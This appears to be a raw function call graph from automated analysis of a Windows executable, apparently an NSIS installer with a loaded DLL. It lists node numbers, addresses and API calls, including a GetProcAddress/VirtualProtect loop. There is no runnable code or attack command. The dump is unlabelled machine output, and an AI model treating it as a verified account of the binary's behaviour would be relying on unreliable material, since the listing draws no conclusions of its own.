7414->7415 7415->7412 7420 36f767a4 7416->7420 7417 36f767b4 7419 36f7571e 20 API calls 7417->7419 7418 36f7571e 20 API calls 7418->7420 7421 36f767bb 7419->7421 7420->7417 7420->7418 7421->7385 7674 36f73370 7685 36f73330 7674->7685 7686 36f73342 7685->7686 7687 36f7334f 7685->7687 7688 36f72ada 5 API calls 7686->7688 7688->7687 7422 36f75bff 7430 36f75d5c 7422->7430 7425 36f75b7a 20 API calls 7426 36f75c1b 7425->7426 7427 36f75c28 7426->7427 7428 36f75c2b 11 API calls 7426->7428 7429 36f75c13 7428->7429 7431 36f75c45 5 API calls 7430->7431 7432 36f75d83 7431->7432 7433 36f75d9b TlsAlloc 7432->7433 7436 36f75d8c 7432->7436 7433->7436 7434 36f72ada 5 API calls 7435 36f75c09 7434->7435 7435->7425 7435->7429 7436->7434 7595 36f767bf 7600 36f767f4 7595->7600 7598 36f7571e 20 API calls 7599 36f767db 7598->7599 7601 36f76806 7600->7601 7609 36f767cd 7600->7609 7602 36f76836 7601->7602 7603 36f7680b 7601->7603 7602->7609 7611 36f771d6 7602->7611 7604 36f7637b 20 API calls 7603->7604 7606 36f76814 7604->7606 7608 36f7571e 20 API calls 7606->7608 7607 36f76851 7610 36f7571e 20 API calls 7607->7610 7608->7609 7609->7598 7609->7599 7610->7609 7612 36f771e1 7611->7612 7613 36f77209 7612->7613 7614 36f771fa 7612->7614 7615 36f77218 7613->7615 7620 36f78a98 7613->7620 7616 36f76368 20 API calls 7614->7616 7627 36f78acb 7615->7627 7619 36f771ff 7616->7619 7619->7607 7621 36f78aa3 7620->7621 7622 36f78ab8 RtlSizeHeap 7620->7622 7623 36f76368 20 API calls 7621->7623 7622->7615 7624 36f78aa8 7623->7624 7625 36f762ac 26 API calls 7624->7625 7626 36f78ab3 7625->7626 7626->7615 7628 36f78ae3 7627->7628 7629 36f78ad8 7627->7629 7630 36f78aeb 7628->7630 7637 36f78af4 7628->7637 7631 36f756d0 21 API calls 7629->7631 7632 36f7571e 20 API calls 7630->7632 7635 36f78ae0 7631->7635 7632->7635 7633 36f78b1e RtlReAllocateHeap 7633->7635 7633->7637 7634 36f78af9 7636 36f76368 20 API calls 7634->7636 7635->7619 7636->7635 7637->7633 7637->7634 7638 36f7474f 7 API calls 7637->7638 7638->7637 7002 36f7543d 7003 36f75440 7002->7003 7004 36f755a8 38 API calls 7003->7004 7005 36f7544c 7004->7005 5993 36f7c7a7 5994 36f7c7be 5993->5994 5999 36f7c82c 5993->5999 5994->5999 6005 36f7c7e6 GetModuleHandleA 5994->6005 5996 36f7c835 GetModuleHandleA 6000 36f7c83f 5996->6000 5997 36f7c872 5998 36f7c7dd 5998->5999 5998->6000 6002 36f7c800 GetProcAddress 5998->6002 5999->5996 5999->5997 5999->6000 6000->5999 6001 36f7c85f GetProcAddress 6000->6001 6001->5999 6002->5999 6003 36f7c80d VirtualProtect 6002->6003 6003->5999 6004 36f7c81c VirtualProtect 6003->6004 6004->5999 6006 36f7c7ef 6005->6006 6013 36f7c82c 6005->6013 6017 36f7c803 GetProcAddress 6006->6017 6008 36f7c7f4 6011 36f7c800 GetProcAddress 6008->6011 6008->6013 6009 36f7c835 GetModuleHandleA 6016 36f7c83f 6009->6016 6010 36f7c872 6012 36f7c80d VirtualProtect 6011->6012 6011->6013 6012->6013 6014 36f7c81c VirtualProtect 6012->6014 6013->6009 6013->6010 6013->6016 6014->6013 6015 36f7c85f GetProcAddress 6015->6013 6016->6013 6016->6015 6018 36f7c82c 6017->6018 6019 36f7c80d VirtualProtect 6017->6019 6021 36f7c835 GetModuleHandleA 6018->6021 6022 36f7c872 6018->6022 6019->6018 6020 36f7c81c VirtualProtect 6019->6020 6020->6018 6023 36f7c83f 6021->6023 6023->6018 6023->6023 6024 36f7c85f GetProcAddress 6023->6024 6024->6023 7437 403350 SetErrorMode GetVersion 7438 4033a0 7437->7438 7461 4065c9 GetSystemDirectoryW 7438->7461 7440 4033ab lstrlenA 7440->7438 7441 4033bb 7440->7441 7464 406639 GetModuleHandleA 7441->7464 7444 406639 5 API calls 7445 4033c9 7444->7445 7446 406639 5 API calls 7445->7446 7447 4033d5 #17 OleInitialize SHGetFileInfoW 7446->7447 7470 40625f lstrcpynW 7447->7470 7450 403421 GetCommandLineW 7471 40625f lstrcpynW 7450->7471 7452 403433 GetModuleHandleW 7453 403453 7452->7453 7472 405b5d 7453->7472 7456 403584 GetTempPathW 7476 40331f 7456->7476 7458 40359c DeleteFileW 7460 402ec1 7458->7460 7462 4065eb wsprintfW LoadLibraryExW 7461->7462 7462->7440 7465 406655 7464->7465 7466 40665f GetProcAddress 7464->7466 7467 4065c9 3 API calls 7465->7467 7468 4033c2 7466->7468 7469 40665b 7467->7469 7468->7444 7469->7466 7469->7468 7470->7450 7471->7452 7473 405b63 7472->7473 7474 40345a CharNextW 7473->7474 7475 405b6a CharNextW 7473->7475 7474->7456 7475->7473 7486 4064f3 7476->7486 7478 40332b 7479 403335 7478->7479 7495 405b30 lstrlenW CharPrevW 7478->7495 7479->7458 7489 406500 7486->7489 7487 406576 7488 40657b CharPrevW 7487->7488 7491 40659c 7487->7491 7488->7487 7489->7487 7490 406569 CharNextW 7489->7490 7492 405b5d CharNextW 7489->7492 7493 406555 CharNextW 7489->7493 7494 406564 CharNextW 7489->7494 7490->7487 7490->7489 7491->7478 7492->7489 7493->7489 7494->7490 7496 40333d 7495->7496 7497 405b4c lstrcatW 7495->7497 7498 40580f CreateDirectoryW 7496->7498 7497->7496 7499 405823 GetLastError 7498->7499 7500 403343 7498->7500 7499->7500 7501 405d80 7500->7501 7502 405d8d GetTickCount GetTempFileNameW 7501->7502 7503 40334e 7502->7503 7504 405dc3 7502->7504 7503->7458 7504->7502 7504->7503 7505 405d51 GetFileAttributesW CreateFileW 7639 36f721a1 7642 36f72418 7639->7642 7643 36f72420 7642->7643 7646 36f747f5 7643->7646 7645 36f721bc 7647 36f74804 7646->7647 7648 36f74808 7646->7648 7647->7645 7651 36f74815 7648->7651 7652 36f75b7a 20 API calls 7651->7652 7655 36f7482c 7652->7655 7653 36f72ada 5 API calls 7654 36f74811 7653->7654 7654->7645 7655->7653 7689 36f79d61 7690 36f79d81 7689->7690 7693 36f79db8 7690->7693 7692 36f79dab 7694 36f79dbf 7693->7694 7695 36f79e20 7694->7695 7699 36f79ddf 7694->7699 7697 36f7a90e 7695->7697 7702 36f7aa17 7695->7702 7697->7692 7699->7697 7700 36f7aa17 21 API calls 7699->7700 7701 36f7a93e 7700->7701 7701->7692 7703 36f7aa20 7702->7703 7706 36f7b19b 7703->7706 7707 36f7b1da 7706->7707 7712 36f7b25c 7707->7712 7716 36f7b59e 7707->7716 7709 36f7b286 7710 36f7b8b2 20 API calls 7709->7710 7711 36f7b292 7709->7711 7710->7711 7713 36f72ada 5 API calls 7711->7713 7712->7709 7714 36f778a3 5 API calls 7712->7714 7715 36f79e6e 7713->7715 7714->7709 7715->7692 7717 36f7b5c1 RaiseException 7716->7717 7718 36f7b5bc 7717->7718 7718->7712 6924 36f77260 GetStartupInfoW 6925 36f77286 6924->6925 6926 36f77318 6924->6926 6925->6926 6930 36f78be3 6925->6930 6928 36f772af 6928->6926 6929 36f772dd GetFileType 6928->6929 6929->6928 6931 36f78bef 6930->6931 6932 36f78c13 6931->6932 6933 36f78bfc 6931->6933 6943 36f75671 RtlEnterCriticalSection 6932->6943 6934 36f76368 20 API calls 6933->6934 6936 36f78c01 6934->6936 6937 36f762ac 26 API calls 6936->6937 6939 36f78c0b 6937->6939 6938 36f78c4b 6951 36f78c72 6938->6951 6939->6928 6940 36f78c1f 6940->6938 6944 36f78b34 6940->6944 6943->6940 6945 36f7637b 20 API calls 6944->6945 6947 36f78b46 6945->6947 6946 36f78b53 6948 36f7571e 20 API calls 6946->6948 6947->6946 6949 36f75eb7 11 API calls 6947->6949 6950 36f78ba5 6948->6950 6949->6947 6950->6940 6954 36f756b9 RtlLeaveCriticalSection 6951->6954 6953 36f78c79 6953->6939 6954->6953 7506 36f7a1e0 7509 36f7a1fe 7506->7509 7508 36f7a1f6 7510 36f7a203 7509->7510 7511 36f7a298 7510->7511 7512 36f7aa53 21 API calls 7510->7512 7511->7508 7513 36f7a42f 7512->7513 7513->7508 7656 36f781a0 7657 36f781d9 7656->7657 7658 36f781dd 7657->7658 7669 36f78205 7657->7669 7659 36f76368 20 API calls 7658->7659 7661 36f781e2 7659->7661 7660 36f78529 7662 36f72ada 5 API calls 7660->7662 7663 36f762ac 26 API calls 7661->7663 7664 36f78536 7662->7664 7665 36f781ed 7663->7665 7666 36f72ada 5 API calls 7665->7666 7668 36f781f9 7666->7668 7669->7660 7670 36f780c0 7669->7670 7673 36f780db 7670->7673 7671 36f72ada 5 API calls 7672 36f78152 7671->7672 7672->7669 7673->7671 6955 36f7506f 6956 36f75081 6955->6956 6957 36f75087 6955->6957 6958 36f75000 20 API calls 6956->6958 6958->6957 6837 36f760ac 6838 36f760dd 6837->6838 6840 36f760b7 6837->6840 6839 36f760c7 FreeLibrary 6839->6840 6840->6838 6840->6839 6959 36f7ac6b 6960 36f7ac84 6959->6960 6961 36f7b2f0 21 API calls 6960->6961 6962 36f7acad 6960->6962 6961->6962 7006 36f7742b 7009 36f77430 7006->7009 7007 36f77453 7009->7007 7010 36f78bae 7009->7010 7011 36f78bdd 7010->7011 7012 36f78bbb 7010->7012 7011->7009 7013 36f78bd7 7012->7013 7014 36f78bc9 RtlDeleteCriticalSection 7012->7014 7015 36f7571e 20 API calls 7013->7015 7014->7013 7014->7014 7015->7011 6251 36f74ed7 6262 36f76d60 6251->6262 6256 36f74ef4 6258 36f7571e 20 API calls 6256->6258 6259 36f74f29 6258->6259 6260 36f74eff 6261 36f7571e 20 API calls 6260->6261 6261->6256 6263 36f74ee9 6262->6263 6264 36f76d69 6262->6264 6266 36f77153 GetEnvironmentStringsW 6263->6266 6295 36f76c5f 6264->6295 6267 36f7716a 6266->6267 6277 36f771bd 6266->6277 6270 36f77170 WideCharToMultiByte 6267->6270 6268 36f771c6 FreeEnvironmentStringsW 6269 36f74eee 6268->6269 6269->6256 6278 36f74f2f 6269->6278 6271 36f7718c 6270->6271 6270->6277 6272 36f756d0 21 API calls 6271->6272 6273 36f77192 6272->6273 6274 36f771af 6273->6274 6275 36f77199 WideCharToMultiByte 6273->6275 6276 36f7571e 20 API calls 6274->6276 6275->6274 6276->6277 6277->6268 6277->6269 6279 36f74f44 6278->6279 6280 36f7637b 20 API calls 6279->6280 6284 36f74f6b 6280->6284 6281 36f7571e 20 API calls 6283 36f74fe9 6281->6283 6282 36f74fcf 6282->6281 6283->6260 6284->6282 6285 36f7637b 20 API calls 6284->6285 6286 36f74fd1 6284->6286 6290 36f74ff3 6284->6290 6293 36f7571e 20 API calls 6284->6293 6805 36f7544d 6284->6805 6285->6284 6814 36f75000 6286->6814 6292 36f762bc 11 API calls 6290->6292 6291 36f7571e 20 API calls 6291->6282 6294 36f74fff 6292->6294 6293->6284 6315 36f75af6 GetLastError 6295->6315 6297 36f76c6c 6335 36f76d7e 6297->6335 6299 36f76c74 6344 36f769f3 6299->6344 6302 36f76c8b 6302->6263 6306 36f7571e 20 API calls 6306->6302 6308 36f76cc9 6309 36f76368 20 API calls 6308->6309 6311 36f76cce 6309->6311 6310 36f76d12 6310->6311 6368 36f768c9 6310->6368 6311->6306 6312 36f76ce6 6312->6310 6313 36f7571e 20 API calls 6312->6313 6313->6310 6316 36f75b0c 6315->6316 6317 36f75b12 6315->6317 6318 36f75e08 11 API calls 6316->6318 6319 36f7637b 20 API calls 6317->6319 6321 36f75b61 SetLastError 6317->6321 6318->6317 6320 36f75b24 6319->6320 6322 36f75b2c 6320->6322 6323 36f75e5e 11 API calls 6320->6323 6321->6297 6324 36f7571e 20 API calls 6322->6324 6325 36f75b41 6323->6325 6326 36f75b32 6324->6326 6325->6322 6327 36f75b48 6325->6327 6328 36f75b6d SetLastError 6326->6328 6329 36f7593c 20 API calls 6327->6329 6371 36f755a8 6328->6371 6330 36f75b53 6329->6330 6332 36f7571e 20 API calls 6330->6332 6334 36f75b5a 6332->6334 6334->6321 6334->6328 6336 36f76d8a 6335->6336 6337 36f75af6 38 API calls 6336->6337 6342 36f76d94 6337->6342 6339 36f76e18 6339->6299 6340 36f755a8 38 API calls 6340->6342 6342->6339 6342->6340 6343 36f7571e 20 API calls 6342->6343 6544 36f75671 RtlEnterCriticalSection 6342->6544 6545 36f76e0f 6342->6545 6343->6342 6549 36f754a7 6344->6549 6347 36f76a26 6349 36f76a2b GetACP 6347->6349 6350 36f76a3d 6347->6350 6348 36f76a14 GetOEMCP 6348->6350 6349->6350 6350->6302 6351 36f756d0 6350->6351 6352 36f7570e 6351->6352 6356 36f756de 6351->6356 6353 36f76368 20 API calls 6352->6353 6355 36f7570c 6353->6355 6354 36f756f9 RtlAllocateHeap 6354->6355 6354->6356 6355->6311 6358 36f76e20 6355->6358 6356->6352 6356->6354 6357 36f7474f 7 API calls 6356->6357 6357->6356 6359 36f769f3 40 API calls 6358->6359 6360 36f76e3f 6359->6360 6363 36f76e90 IsValidCodePage 6360->6363 6365 36f76e46 6360->6365 6367 36f76eb5 6360->6367 6361 36f72ada 5 API calls 6362 36f76cc1 6361->6362 6362->6308 6362->6312 6364 36f76ea2 GetCPInfo 6363->6364 6363->6365 6364->6365 6364->6367 6365->6361 6696 36f76acb GetCPInfo 6367->6696 6769 36f76886 6368->6769 6370 36f768ed 6370->6311 6382 36f77613 6371->6382 6375 36f755c2 IsProcessorFeaturePresent 6377 36f755cd 6375->6377 6376 36f755b8 6376->6375 6381 36f755e0 6376->6381 6412 36f760e2 6377->6412 6418 36f74bc1 6381->6418 6421 36f77581 6382->6421 6385 36f7766e 6386 36f7767a 6385->6386 6387 36f75b7a 20 API calls 6386->6387 6389 36f776a1 6386->6389 6392 36f776a7 6386->6392 6387->6389 6388 36f776f3 6391 36f76368 20 API calls 6388->6391 6389->6388 6390 36f776d6 6389->6390 6389->6392 6447 36f7bdc9 6390->6447 6393 36f776f8 6391->6393 6398 36f7771f 6392->6398 6438 36f75671 RtlEnterCriticalSection 6392->6438 6435 36f762ac 6393->6435 6400 36f7777e 6398->6400 6405 36f77776 6398->6405 6408 36f777a9 6398->6408 6439 36f756b9 RtlLeaveCriticalSection 6398->6439 6400->6408 6440 36f77665 6400->6440 6402 36f74bc1 28 API calls 6402->6400 6405->6402 6406 36f75af6 38 API calls 6410 36f7780c 6406->6410 6443 36f7782e 6408->6443 6409 36f77665 38 API calls 6409->6408 6410->6390 6411 36f75af6 38 API calls 6410->6411 6411->6390 6413 36f760fe 6412->6413 6414 36f7612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6413->6414 6415 36f761fb 6414->6415 6416 36f72ada 5 API calls 6415->6416 6417 36f76219 6416->6417 6417->6381 6466 36f7499b 6418->6466 6424 36f77527 6421->6424 6423 36f755ad 6423->6376 6423->6385 6425 36f77533 6424->6425 6430 36f75671 RtlEnterCriticalSection 6425->6430 6427 36f77541 6431 36f77575 6427->6431 6429 36f77568 6429->6423 6430->6427 6434 36f756b9 RtlLeaveCriticalSection 6431->6434 6433 36f7757f 6433->6429 6434->6433 6450 36f76231 6435->6450 6437 36f762b8 6437->6390 6438->6398 6439->6405 6441 36f75af6 38 API calls 6440->6441 6442 36f7766a 6441->6442 6442->6409 6444 36f77834 6443->6444 6445 36f777fd 6443->6445 6465 36f756b9 RtlLeaveCriticalSection 6444->6465 6445->6390 6445->6406 6445->6410 6448 36f72ada 5 API calls 6447->6448 6449 36f7bdd4 6448->6449 6449->6449 6451 36f75b7a 20 API calls 6450->6451 6452 36f76247 6451->6452 6453 36f762a6 6452->6453 6457 36f76255 6452->6457 6461 36f762bc IsProcessorFeaturePresent 6453->6461 6455 36f762ab 6456 36f76231 26 API calls 6455->6456 6458 36f762b8 6456->6458 6459 36f72ada 5 API calls 6457->6459 6458->6437 6460 36f7627c 6459->6460 6460->6437 6462 36f762c7 6461->6462 6463 36f760e2 8 API calls 6462->6463 6464 36f762dc GetCurrentProcess TerminateProcess 6463->6464 6464->6455 6465->6445 6467 36f749a7 6466->6467 6468 36f749bf 6467->6468 6488 36f74af5 GetModuleHandleW 6467->6488 6497 36f75671 RtlEnterCriticalSection 6468->6497 6474 36f749c7 6485 36f74a65 6474->6485 6487 36f74a3c 6474->6487 6498 36f7527a 6474->6498 6476 36f74a82 6508 36f74ab4 6476->6508 6477 36f74aae 6482 36f7bdc9 5 API calls 6477->6482 6479 36f74669 5 API calls 6479->6485 6483 36f74ab3 6482->6483 6484 36f74a54 6484->6479 6505 36f74aa5 6485->6505 6487->6484 6501 36f74669 6487->6501 6489 36f749b3 6488->6489 6489->6468 6490 36f74b39 GetModuleHandleExW 6489->6490 6491 36f74b63 GetProcAddress 6490->6491 6494 36f74b78 6490->6494 6491->6494 6492 36f74b95 6495 36f72ada 5 API calls 6492->6495 6493 36f74b8c FreeLibrary 6493->6492 6494->6492 6494->6493 6496 36f74b9f 6495->6496 6496->6468 6497->6474 6516 36f75132 6498->6516 6503 36f74698 6501->6503 6502 36f72ada 5 API calls 6504 36f746c1 6502->6504 6503->6502 6504->6484 6537 36f756b9 RtlLeaveCriticalSection 6505->6537 6507 36f74a7e 6507->6476 6507->6477 6538 36f76025 6508->6538 6511 36f74ae2 6514 36f74b39 8 API calls 6511->6514 6512 36f74ac2 GetPEB 6512->6511 6513 36f74ad2 GetCurrentProcess TerminateProcess 6512->6513 6513->6511 6515 36f74aea ExitProcess 6514->6515 6519 36f750e1 6516->6519 6518 36f75156 6518->6487 6520 36f750ed 6519->6520 6527 36f75671 RtlEnterCriticalSection 6520->6527 6522 36f750fb 6528 36f7515a 6522->6528 6526 36f75119 6526->6518 6527->6522 6531 36f75182 6528->6531 6533 36f7517a 6528->6533 6529 36f72ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6530 36f75108 6529->6530 6534 36f75126 6530->6534 6532 36f7571e 20 API calls 6531->6532 6531->6533 6532->6533 6533->6529 6535 36f756b9 RtlLeaveCriticalSection 6534->6535 6536 36f75130 6535->6536 6536->6526 6537->6507 6539 36f76040 6538->6539 6540 36f7604a 6538->6540 6542 36f72ada 5 API calls 6539->6542 6541 36f75c45 5 API calls 6540->6541 6541->6539 6543 36f74abe 6542->6543 6543->6511 6543->6512 6544->6342 6548 36f756b9 RtlLeaveCriticalSection 6545->6548 6547 36f76e16 6547->6342 6548->6547 6550 36f754c4 6549->6550 6556 36f754ba 6549->6556 6551 36f75af6 38 API calls 6550->6551 6550->6556 6552 36f754e5 6551->6552 6557 36f77a00 6552->6557 6556->6347 6556->6348 6558 36f77a13 6557->6558 6559 36f754fe 6557->6559 6558->6559 6565 36f77f0f 6558->6565 6561 36f77a2d 6559->6561 6562 36f77a55 6561->6562 6563 36f77a40 6561->6563 6562->6556 6563->6562 6564 36f76d7e 38 API calls 6563->6564 6564->6562 6566 36f77f1b 6565->6566 6567 36f75af6 38 API calls 6566->6567 6568 36f77f24 6567->6568 6569 36f77f72 6568->6569 6577 36f75671 RtlEnterCriticalSection 6568->6577 6569->6559 6571 36f77f42 6578 36f77f86 6571->6578 6576 36f755a8 38 API calls 6576->6569 6577->6571 6579 36f77f56 6578->6579 6580 36f77f94 6578->6580 6582 36f77f75 6579->6582 6580->6579 6585 36f77cc2 6580->6585 6695 36f756b9 RtlLeaveCriticalSection 6582->6695 6584 36f77f69 6584->6569 6584->6576 6587 36f77d42 6585->6587 6589 36f77cd8 6585->6589 6586 36f77d90 6653 36f77e35 6586->6653 6587->6586 6590 36f7571e 20 API calls 6587->6590 6589->6587 6592 36f77d0b 6589->6592 6597 36f7571e 20 API calls 6589->6597 6591 36f77d64 6590->6591 6593 36f7571e 20 API calls 6591->6593 6594 36f77d2d 6592->6594 6599 36f7571e 20 API calls 6592->6599 6595 36f77d77 6593->6595 6596 36f7571e 20 API calls 6594->6596 6598 36f7571e 20 API calls 6595->6598 6600 36f77d37 6596->6600 6602 36f77d00 6597->6602 6604 36f77d85 6598->6604 6605 36f77d22 6599->6605 6606 36f7571e 20 API calls 6600->6606 6601 36f77dfe 6607 36f7571e 20 API calls 6601->6607 6613 36f790ba 6602->6613 6603 36f77d9e 6603->6601 6612 36f7571e 20 API calls 6603->6612 6609 36f7571e 20 API calls 6604->6609 6641 36f791b8 6605->6641 6606->6587 6611 36f77e04 6607->6611 6609->6586 6611->6579 6612->6603 6614 36f790cb 6613->6614 6640 36f791b4 6613->6640 6615 36f790dc 6614->6615 6616 36f7571e 20 API calls 6614->6616 6617 36f790ee 6615->6617 6619 36f7571e 20 API calls 6615->6619 6616->6615 6618 36f79100 6617->6618 6620 36f7571e 20 API calls 6617->6620 6621 36f79112 6618->6621 6622 36f7571e 20 API calls 6618->6622 6619->6617 6620->6618 6623 36f79124 6621->6623 6624 36f7571e 20 API calls 6621->6624 6622->6621 6625 36f79136 6623->6625 6627 36f7571e 20 API calls 6623->6627 6624->6623 6626 36f79148 6625->6626 6628 36f7571e 20 API calls 6625->6628 6629 36f7571e 20 API calls 6626->6629 6630 36f7915a 6626->6630 6627->6625 6628->6626 6629->6630 6631 36f7916c 6630->6631 6632 36f7571e 20 API calls 6630->6632 6633 36f7917e 6631->6633 6635 36f7571e 20 API calls 6631->6635 6632->6631 6634 36f79190 6633->6634 6636 36f7571e 20 API calls 6633->6636 6637 36f791a2 6634->6637 6638 36f7571e 20 API calls 6634->6638 6635->6633 6636->6634 6639 36f7571e 20 API calls 6637->6639 6637->6640 6638->6637 6639->6640 6640->6592 6642 36f791c5 6641->6642 6643 36f7921d 6641->6643 6644 36f791d5 6642->6644 6645 36f7571e 20 API calls 6642->6645 6643->6594 6646 36f791e7 6644->6646 6647 36f7571e 20 API calls 6644->6647 6645->6644 6648 36f791f9 6646->6648 6649 36f7571e 20 API calls 6646->6649 6647->6646 6650 36f7920b 6648->6650 6651 36f7571e 20 API calls 6648->6651 6649->6648 6650->6643 6652 36f7571e 20 API calls 6650->6652 6651->6650 6652->6643 6654 36f77e42 6653->6654 6658 36f77e60 6653->6658 6654->6658 6659 36f7925d 6654->6659 6657 36f7571e 20 API calls 6657->6658 6658->6603 6660 36f77e5a 6659->6660 6661 36f7926e 6659->6661 6660->6657 6662 36f79221 20 API calls 6661->6662 6663 36f79276 6662->6663 6664 36f79221 20 API calls 6663->6664 6665 36f79281 6664->6665 6666 36f79221 20 API calls 6665->6666 6667 36f7928c 6666->6667 6668 36f79221 20 API calls 6667->6668 6669 36f79297 6668->6669 6670 36f79221 20 API calls 6669->6670 6671 36f792a5 6670->6671 6672 36f7571e 20 API calls 6671->6672 6673 36f792b0 6672->6673 6674 36f7571e 20 API calls 6673->6674 6675 36f792bb 6674->6675 6676 36f7571e 20 API calls 6675->6676 6677 36f792c6 6676->6677 6678 36f79221 20 API calls 6677->6678 6679 36f792d4 6678->6679 6680 36f79221 20 API calls 6679->6680 6681 36f792e2 6680->6681 6682 36f79221 20 API calls 6681->6682 6683 36f792f3 6682->6683 6684 36f79221 20 API calls 6683->6684 6685 36f79301 6684->6685 6686 36f79221 20 API calls 6685->6686 6687 36f7930f 6686->6687 6688 36f7571e 20 API calls 6687->6688 6689 36f7931a 6688->6689 6690 36f7571e 20 API calls 6689->6690 6691 36f79325 6690->6691 6692 36f7571e 20 API calls 6691->6692 6693 36f79330 6692->6693 6694 36f7571e 20 API calls 6693->6694 6694->6660 6695->6584 6697 36f76baf 6696->6697 6703 36f76b05 6696->6703 6700 36f72ada 5 API calls 6697->6700 6702 36f76c5b 6700->6702 6702->6365 6706 36f786e4 6703->6706 6705 36f78a3e 43 API calls 6705->6697 6707 36f754a7 38 API calls 6706->6707 6708 36f78704 MultiByteToWideChar 6707->6708 6710 36f78742 6708->6710 6717 36f787da 6708->6717 6711 36f78763 6710->6711 6713 36f756d0 21 API calls 6710->6713 6715 36f787d4 6711->6715 6718 36f787a8 MultiByteToWideChar 6711->6718 6712 36f72ada 5 API calls 6714 36f76b66 6712->6714 6713->6711 6720 36f78a3e 6714->6720 6725 36f78801 6715->6725 6717->6712 6718->6715 6719 36f787c4 GetStringTypeW 6718->6719 6719->6715 6721 36f754a7 38 API calls 6720->6721 6722 36f78a51 6721->6722 6729 36f78821 6722->6729 6726 36f7881e 6725->6726 6727 36f7880d 6725->6727 6726->6717 6727->6726 6728 36f7571e 20 API calls 6727->6728 6728->6726 6730 36f7883c 6729->6730 6731 36f78862 MultiByteToWideChar 6730->6731 6732 36f7888c 6731->6732 6733 36f78a16 6731->6733 6736 36f756d0 21 API calls 6732->6736 6740 36f788ad 6732->6740 6734 36f72ada 5 API calls 6733->6734 6735 36f76b87 6734->6735 6735->6705 6736->6740 6737 36f788f6 MultiByteToWideChar 6738 36f78962 6737->6738 6739 36f7890f 6737->6739 6742 36f78801 20 API calls 6738->6742 6756 36f75f19 6739->6756 6740->6737 6740->6738 6742->6733 6744 36f78971 6746 36f756d0 21 API calls 6744->6746 6749 36f78992 6744->6749 6745 36f78939 6745->6738 6747 36f75f19 11 API calls 6745->6747 6746->6749 6747->6738 6748 36f78a07 6751 36f78801 20 API calls 6748->6751 6749->6748 6750 36f75f19 11 API calls 6749->6750 6752 36f789e6 6750->6752 6751->6738 6752->6748 6753 36f789f5 WideCharToMultiByte 6752->6753 6753->6748 6754 36f78a35 6753->6754 6755 36f78801 20 API calls 6754->6755 6755->6738 6757 36f75c45 5 API calls 6756->6757 6758 36f75f40 6757->6758 6761 36f75f49 6758->6761 6764 36f75fa1 6758->6764 6762 36f72ada 5 API calls 6761->6762 6763 36f75f9b 6762->6763 6763->6738 6763->6744 6763->6745 6765 36f75c45 5 API calls 6764->6765 6766 36f75fc8 6765->6766 6767 36f72ada 5 API calls 6766->6767 6768 36f75f89 LCMapStringW 6767->6768 6768->6761 6770 36f76892 6769->6770 6777 36f75671 RtlEnterCriticalSection 6770->6777 6772 36f7689c 6778 36f768f1 6772->6778 6776 36f768b5 6776->6370 6777->6772 6790 36f77011 6778->6790 6780 36f7693f 6781 36f77011 26 API calls 6780->6781 6782 36f7695b 6781->6782 6783 36f77011 26 API calls 6782->6783 6784 36f76979 6783->6784 6785 36f768a9 6784->6785 6786 36f7571e 20 API calls 6784->6786 6787 36f768bd 6785->6787 6786->6785 6804 36f756b9 RtlLeaveCriticalSection 6787->6804 6789 36f768c7 6789->6776 6791 36f77022 6790->6791 6800 36f7701e 6790->6800 6792 36f77029 6791->6792 6795 36f7703c 6791->6795 6793 36f76368 20 API calls 6792->6793 6794 36f7702e 6793->6794 6796 36f762ac 26 API calls 6794->6796 6797 36f77073 6795->6797 6798 36f7706a 6795->6798 6795->6800 6796->6800 6797->6800 6802 36f76368 20 API calls 6797->6802 6799 36f76368 20 API calls 6798->6799 6801 36f7706f 6799->6801 6800->6780 6803 36f762ac 26 API calls 6801->6803 6802->6801 6803->6800 6804->6789 6806 36f75468 6805->6806 6807 36f7545a 6805->6807 6808 36f76368 20 API calls 6806->6808 6807->6806 6812 36f7547f 6807->6812 6809 36f75470 6808->6809 6810 36f762ac 26 API calls 6809->6810 6811 36f7547a 6810->6811 6811->6284 6812->6811 6813 36f76368 20 API calls 6812->6813 6813->6809 6815 36f7500d 6814->6815 6819 36f74fd7 6814->6819 6816 36f75024 6815->6816 6818 36f7571e 20 API calls 6815->6818 6817 36f7571e 20 API calls 6816->6817 6817->6819 6818->6815 6819->6291 7514 36f773d5 7515 36f773e1 7514->7515 7526 36f75671 RtlEnterCriticalSection 7515->7526 7517 36f773e8 7518 36f78be3 27 API calls 7517->7518 7519 36f773f7 7518->7519 7525 36f77406 7519->7525 7527 36f77269 GetStartupInfoW 7519->7527 7524 36f77417 7538 36f77422 7525->7538 7526->7517 7528 36f77286 7527->7528 7529 36f77318 7527->7529 7528->7529 7530 36f78be3 27 API calls 7528->7530 7533 36f7731f 7529->7533 7531 36f772af 7530->7531 7531->7529 7532 36f772dd GetFileType 7531->7532 7532->7531 7535 36f77326 7533->7535 7534 36f77369 GetStdHandle 7534->7535 7535->7534 7536 36f773d1 7535->7536 7537 36f7737c GetFileType 7535->7537 7536->7525 7537->7535 7541 36f756b9 RtlLeaveCriticalSection 7538->7541 7540 36f77429 7540->7524 7541->7540 7719 36f75351 7720 36f75360 7719->7720 7721 36f75374 7719->7721 7720->7721 7724 36f7571e 20 API calls 7720->7724 7722 36f7571e 20 API calls 7721->7722 7723 36f75386 7722->7723 7725 36f7571e 20 API calls 7723->7725 7724->7721 7726 36f75399 7725->7726 7727 36f7571e 20 API calls 7726->7727 7728 36f753aa 7727->7728 7729 36f7571e 20 API calls 7728->7729 7730 36f753bb 7729->7730 6820 36f736d0 6821 36f736e2 6820->6821 6823 36f736f0 6820->6823 6822 36f72ada 5 API calls 6821->6822 6822->6823 6841 36f73c90 RtlUnwind 7542 36f74bdd 7543 36f74bec 7542->7543 7544 36f74c08 7542->7544 7543->7544 7545 36f74bf2 7543->7545 7546 36f76d60 51 API calls 7544->7546 7547 36f76368 20 API calls 7545->7547 7548 36f74c0f GetModuleFileNameA 7546->7548 7549 36f74bf7 7547->7549 7550 36f74c33 7548->7550 7551 36f762ac 26 API calls 7549->7551 7565 36f74d01 7550->7565 7552 36f74c01 7551->7552 7555 36f74e76 20 API calls 7556 36f74c5d 7555->7556 7557 36f74c66 7556->7557 7558 36f74c72 7556->7558 7559 36f76368 20 API calls 7557->7559 7560 36f74d01 38 API calls 7558->7560 7564 36f74c6b 7559->7564 7562 36f74c88 7560->7562 7561 36f7571e 20 API calls 7561->7552 7563 36f7571e 20 API calls 7562->7563 7562->7564 7563->7564 7564->7561 7567 36f74d26 7565->7567 7569 36f74d86 